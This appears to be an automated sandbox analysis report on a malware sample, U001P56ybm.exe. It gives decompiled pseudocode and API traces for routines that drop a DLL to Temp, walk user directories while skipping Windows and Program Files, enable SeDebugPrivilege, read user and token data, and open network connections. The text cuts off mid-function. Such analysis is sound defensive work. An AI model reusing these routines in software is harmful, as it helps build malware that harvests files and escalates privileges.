                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: _memcmp
                    • String ID: unsupported interface: %s
                    • API String ID: 2931989736-1937909893
                    • Opcode ID: bb5d88d6cdf7618ba146592c6a9651e3403649e95444aff9d86a8c3adaea291b
                    • Instruction ID: 376803f9b6cd03f4d3cadd785aa3c846a8ad5edfc35f26e6f9bfc6bfbb7498cf
                    • Opcode Fuzzy Hash: bb5d88d6cdf7618ba146592c6a9651e3403649e95444aff9d86a8c3adaea291b
                    • Instruction Fuzzy Hash: C0112AB9900209AFEB00DF60DC45FAE77B5EB49380F108468F9199B385D775EA90CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • unsupported interface: %s, xrefs: 10002C05
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: _memcmp
                    • String ID: unsupported interface: %s
                    • API String ID: 2931989736-1937909893
                    • Opcode ID: 80759d18eaf17e604566ee0e5978b2585ecc03b8fcbc2e55147d9b1dab74aa11
                    • Instruction ID: 760502f69ff5a67b9f1a9b5b43ffb384ee39693a39a9ce54f4b70e5547f58f8e
                    • Opcode Fuzzy Hash: 80759d18eaf17e604566ee0e5978b2585ecc03b8fcbc2e55147d9b1dab74aa11
                    • Instruction Fuzzy Hash: 5F112EB9900208ABE700DF64DC45FED77A4EB45380F108568F9055B345E775EA90CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f78 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                    0x004024b0
                    0x004024b0
                    0x004024b3
                    0x004024ce
                    0x004024b5
                    0x004024b7
                    0x004024bc
                    0x004024c3
                    0x004024d5
                    0x0040264e
                    0x0040264e
                    0x004024db
                    0x004024ed
                    0x004015a6
                    0x004015a8
                    0x00000000
                    0x004015ae
                    0x004015a8
                    0x00402880
                    0x0040288c

                    APIs
                    • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll, xrefs: 004024BC, 004024E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FileWritelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
                    • API String ID: 427699356-706998987
                    • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                    • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                    • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                    • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405465, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405465(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                    0x00405466
                    0x00405470
                    0x00405472
                    0x00405479
                    0x00405481
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405481
                    0x00405483
                    0x00405488

                    APIs
                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U001P56ybm.exe,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 0040546B
                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U001P56ybm.exe,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00405479
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CharPrevlstrlen
                    • String ID: C:\Users\user\Desktop
                    • API String ID: 2709904686-1669384263
                    • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                    • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405577, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405577(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                    0x00405583
                    0x00405585
                    0x004055ad
                    0x00405592
                    0x00405597
                    0x004055a2
                    0x00000000
                    0x004055bf
                    0x004055ab
                    0x004055ab
                    0x00000000

                    APIs
                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                    • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: U001P56ybm.exe PID: 5684 Parent PID: 4640 U001P56ybm.exeCOMMON

                    Executed Functions

                    Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                    0x00403d82
                    0x00403d88
                    0x00403d8c
                    0x00403d8d
                    0x00403d90
                    0x00403ea9
                    0x00403ea9
                    0x00403eb9
                    0x00403ebb
                    0x00403ec0
                    0x00403f95
                    0x00403f95
                    0x00000000
                    0x00403f95
                    0x00403ece
                    0x00403edb
                    0x00403edd
                    0x00403ee2
                    0x00403f8e
                    0x00403f8f
                    0x00000000
                    0x00403f94
                    0x00000000
                    0x00403ee8
                    0x00403ef8
                    0x00403f0a
                    0x00403f12
                    0x00403f18
                    0x00403f26
                    0x00403f28
                    0x00403f2d
                    0x00000000
                    0x00000000
                    0x00403f33
                    0x00403f76
                    0x00403f7c
                    0x00000000
                    0x00403f83
                    0x00403f36
                    0x00403f3a
                    0x00000000
                    0x00403f40
                    0x00403f0c
                    0x00403f10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403f41
                    0x00403f41
                    0x00403f4b
                    0x00403f58
                    0x00403f5c
                    0x00403f88
                    0x00000000
                    0x00403f8d
                    0x00403f60
                    0x00000000
                    0x00403f60
                    0x00403ef8
                    0x00403ee8
                    0x00403da3
                    0x00403da9
                    0x00403ea6
                    0x00403ea8
                    0x00000000
                    0x00403ea8
                    0x00403db7
                    0x00403dc4
                    0x00403dc6
                    0x00403dcb
                    0x00403e9d
                    0x00403e9e
                    0x00403ea4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403dd1
                    0x00403dd1
                    0x00403dd8
                    0x00000000
                    0x00000000
                    0x00403de2
                    0x00403e12
                    0x00403e22
                    0x00403e30
                    0x00403e36
                    0x00403e3f
                    0x00403e44
                    0x00403e47
                    0x00403e4a
                    0x00403e4c
                    0x00000000
                    0x00000000
                    0x00403e63
                    0x00403e65
                    0x00403e6a
                    0x00403e6f
                    0x00403f64
                    0x00403f6a
                    0x00000000
                    0x00403f71
                    0x00000000
                    0x00403e6f
                    0x00403e26
                    0x00403e27
                    0x00403e2e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e2e
                    0x00403dea
                    0x00403df9
                    0x00000000
                    0x00000000
                    0x00403e01
                    0x00403e10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e75
                    0x00403e7f
                    0x00403e8c
                    0x00403e8e
                    0x00403e97
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                    0x00406512
                    0x00406514
                    0x00406522
                    0x00406524
                    0x00406530
                    0x00406534
                    0x0040653f
                    0x0040654e
                    0x00406552
                    0x0040655a
                    0x0040655f
                    0x0040656d
                    0x00406570
                    0x00406573
                    0x0040657a
                    0x00406589
                    0x0040658d
                    0x00406590
                    0x00406594
                    0x00000000
                    0x0040659a
                    0x004065a1

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                    0x00406077
                    0x00406082
                    0x00406085

                    APIs
                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                    Download Yara Rule
                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				void* _t41;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
									_t67 = _t41;
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}



























                    0x004061c3
                    0x004061cb
                    0x004061cd
                    0x004061d0
                    0x004061de
                    0x004061e0
                    0x004061e5
                    0x004061e9
                    0x004061eb
                    0x004061ed
                    0x004061f2
                    0x0040622a
                    0x00406230
                    0x00406235
                    0x00406239
                    0x0040623b
                    0x00406244
                    0x00406249
                    0x00406249
                    0x0040624c
                    0x00406253
                    0x00406256
                    0x00406258
                    0x00406261
                    0x00406266
                    0x00406266
                    0x00406270
                    0x00406273
                    0x00406276
                    0x0040627b
                    0x0040627e
                    0x0040628c
                    0x0040628e
                    0x00406290
                    0x00406295
                    0x0040629a
                    0x0040629e
                    0x004062a0
                    0x004062ac
                    0x004062af
                    0x004062b7
                    0x004062b9
                    0x004062c9
                    0x004062e0
                    0x004062e2
                    0x004062e4
                    0x004062ec
                    0x004062f3
                    0x004062f3
                    0x004062e4
                    0x004062f8
                    0x004062fd
                    0x004062a0
                    0x004062fe
                    0x00406302
                    0x00406307
                    0x0040630c
                    0x0040630d
                    0x0040630f
                    0x00406312
                    0x00406317
                    0x00406318
                    0x0040631c
                    0x0040631e
                    0x00406321
                    0x00406326
                    0x00000000
                    0x00406327
                    0x004061f4
                    0x004061ff
                    0x00406208
                    0x00406218
                    0x0040621d
                    0x00406224
                    0x00406226
                    0x00406228
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406228
                    0x00406201
                    0x00000000

                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
